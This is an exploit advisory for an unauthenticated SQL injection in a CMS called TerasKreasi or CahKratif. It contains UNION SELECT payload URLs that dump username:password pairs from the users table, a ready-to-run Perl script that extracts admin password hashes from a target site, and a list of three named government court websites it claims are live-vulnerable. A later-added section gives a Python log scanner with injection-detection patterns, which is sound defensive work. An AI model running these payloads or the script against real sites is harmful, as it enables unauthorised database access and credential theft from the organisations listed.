###########################
# CahKratif CMS Remote SQL Injection Exploit Vulnerability
###########################
=========================================================
[+] Title :- TerasKreasi CMS Remote SQL Injection Exploit Vulnerability
[+] Vendor Homepage :- http://teraskreasi.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Exploit Author :- K33P-S1L3NT
[+] Team name :- Ternate Lab Pentesting
[+] Official Page :- www.facebook.com/loading.gov/
[+] Available :- sql injection cheat sheet | sql injection Remote Script perl
[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka
[+] Contact :- aurorakoizora@gmail.com
=========================================================
[+] Severity Level :- Medium
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id, hal-visi-dan-misi-pengadilan-agama-blabla.html (string)
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via Multiple PHP Files causing an SQL error
[+] SQL vulnerable File :- /home/user/public_html/XXX.php
[+] POC :- http://127.0.0.1/hal-visi-dan-misi-pengadilan-agama-blabla' and false UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19+from+users+--+.html
The SQL injection vulnerability can be exploited by remote attackers without any privileged web-application user account and without user interaction.
##################################################################
NOTE!!!
[+] Edit the Perl script for the vulnerable table's username and password
DEMO!!!
[+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19+from+users+--+.html
( edit number column for open table group_concat(username,0x3a,password) )
[ like number 7 or 8 or 9 or 10 or 11 or 12 or 13 ]
[+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19+from+users+--+.html
[+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,8,9,like number,11,12,13,14,15,16,17,18,19+from+users+--+.html
###################################################################
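Detection note (added example, not part of the original advisory or the vendor's code): because the injection rides in the URL slug rather than a query-string parameter, it can be spotted in web-server access logs. The script below assumes legitimate page URLs are a single [A-Za-z0-9_-] slug ending in .html; the log lines, IPs and status codes are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Access-log line: client IP ... "METHOD path HTTP/x" status
LOG = re.compile(r'^(\S+) .*?"(?:GET|POST) (.+?) HTTP/[\d.]+" (\d{3})')
# Assumption: legitimate page URLs are a single [A-Za-z0-9_-] slug + ".html"
SLUG_OK = re.compile(r"^/[A-Za-z0-9_-]+\.html$")
SIGNS = {  # markers taken from the PoC URL in this advisory
    "quote in slug": re.compile(r"'"),
    "union select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "group_concat()": re.compile(r"\bgroup_concat\s*\("),
    "sql comment": re.compile(r"--\s|#|/\*"),
}

def classify(raw_path):
    """Return the reasons a .html request path looks like slug injection."""
    path = raw_path.split("?", 1)[0]
    if not path.lower().endswith(".html") or SLUG_OK.match(path):
        return []
    # Decode %xx and '+', collapse whitespace, lowercase before matching.
    decoded = re.sub(r"\s+", " ", unquote_plus(path)).lower()
    reasons = [name for name, rx in SIGNS.items() if rx.search(decoded)]
    return reasons or ["slug outside allowlist"]

def scan(lines):
    """Return (client_ip, status, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG.match(line)
        if m and (why := classify(m.group(2))):
            hits.append((m.group(1), int(m.group(3)), why))
    return hits

COLS = "1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19"
SAMPLE = [  # constructed log lines; IPs are documentation ranges
    '192.0.2.10 - - [01/Jan/2016:10:00:00 +0000] "GET /hal-visi-dan-misi-pengadilan-agama-blabla.html HTTP/1.1" 200 8211',
    f'198.51.100.7 - - [01/Jan/2016:10:00:05 +0000] "GET /vuln-bugs\'+and+false+UNION+SELECT+{COLS}+from+users+--+.html HTTP/1.1" 200 9034',
    f'198.51.100.7 - - [01/Jan/2016:10:00:09 +0000] "GET /vuln-bugs%27%20AND%20false%20UnIoN%20SeLeCt%20{COLS}%20from%20users%20--%20.html HTTP/1.1" 200 9034',
    '203.0.113.9 - - [01/Jan/2016:10:01:00 +0000] "GET /vuln-bugs\'.html HTTP/1.1" 500 312',
    '192.0.2.10 - - [01/Jan/2016:10:01:02 +0000] "GET /css/style.css HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for ip, status, why in scan(SAMPLE):
        print(ip, status, ", ".join(why))
```

Matching on logs only detects attempts; the fix on the application side is to bind the slug as a parameter in a prepared statement instead of concatenating it into the query.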
Remote Exploit Perl script
---------------------------
#!/usr/bin/perl -w
########################################
#[~] Author : K33P-S1L3NT
#[!] Exploit Name: Ternate Exploit
########################################
print "\n\n";
print "##############################################
# [~] Author : K33P-S1L3NT #
# [!] Exploit Name: Ternate Exploit #
# [+] Publish : www.facebook.com/loading.gov #
############################################## \n\n";
print "+-+ Remote SQL Injection Exploit +-+ \n\n";
use LWP::UserAgent;
print " Target site:[http://www.site.com/path/]: ";
chomp(my $target=<STDIN>);
$Ternate="group_concat(username,0x3a,password)";
$Labs="users";
$Pentesting="'+and+false";
$Exploit="+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/hal-visi-misi-pengadilan-agama-morotai".$Pentesting."+".$Exploit."1,2,3,4,5,6,7,".$Ternate.",9,10,11,12,13,14,15,16,17,18,19+from+".$Labs."+--+.html";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Account : $1\n\n";
print "# Exploit Done #\n\n";
}
else
{print "\n[-] NOT FOUND.";
}
----------------------------------------------------------------------------------------------------
NOTE SCRIPT!!
[+] Edit the script => $host = $target . "/hal-visi-misi-pengadilan-agama-blabla" or $host = $target . "/blabla-bugs-vuln"
LIVE!!!
http://pa-morotai.go.id/ => http://i.imgur.com/2fqM3WR.png
http://pa-ternate.go.id/ => http://i.imgur.com/EmklNdn.png
http://pn-tobelo.go.id/ => http://i.imgur.com/2GnnxJ5.png
###################################
# #
# Discovered Analyze by : Ternate-Labs Pentesting #
# #
###################################